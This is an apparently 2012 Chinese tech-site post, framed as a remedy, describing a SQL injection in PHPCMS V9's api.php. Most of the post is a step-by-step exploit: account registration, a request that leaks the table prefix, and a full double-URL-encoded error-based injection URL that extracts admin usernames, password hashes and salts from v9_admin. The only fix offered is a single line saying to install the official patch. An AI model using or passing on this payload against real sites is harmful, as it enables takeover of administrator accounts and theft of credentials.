IT技术互动交流平台

PHPCMS V9最新Sql注入0day漏洞爆管理员密码修复方案

发布日期:2012-09-08 11:34:54

漏洞形成原因就不多说了,文件在phpcms/api.php ,有兴趣的盆友可以多去挖一挖phpcms的洞子。

主要利用过程:

第一步:注册一个用户

http://www.xxx.com/index.php?m=member&c=index&a=register&siteid=1

第二步:访问api文件,爆出表前缀,默认的表前缀为v9

http://www.xxx.com/api.php?op=add_favorite&url=xxx.com&title=%2527

 


 

第三步:爆出用户密码(下面红色的字体就是要修改的表前缀)

http://www.xxx.com/api.php?op=add_favorite&url=v9&title=%2527%2520and%2520%2528select%25201%2520from%2528select%2520count%2528%252a%2529%252Cconcat%2528%2528select%2520%2528select%2520%2528select%2520concat%25280×23%252Ccast%2528concat%2528username%252C0x3a%252Cpassword%252C0x3a%252Cencrypt%2529%2520as%2520char%2529%252C0x23%2529%2520from%2520v9_admin%2520LIMIT%25200%252C1%2529%2529%2520from%2520information_schema.tables%2520limit%25200%252C1%2529%252Cfloor%2528rand%25280%2529%252a2%2529%2529x%2520from%2520information_schema.tables%2520group%2520by%2520x%2529a%2529%2520and%2520%25271%2527%253D%25271

 

如图:

 


 

修复方案: 官方已发布修复补丁,尽快升级补丁确保网站安全!

Tag标签: PHPCMS   V9,Sql注入  
  • 专题推荐

About IT165 - 广告服务 - 隐私声明 - 版权申明 - 免责条款 - 网站地图 - 网友投稿 - 联系方式
本站内容来自于互联网,仅供用于网络技术学习,学习中请遵循相关法律法规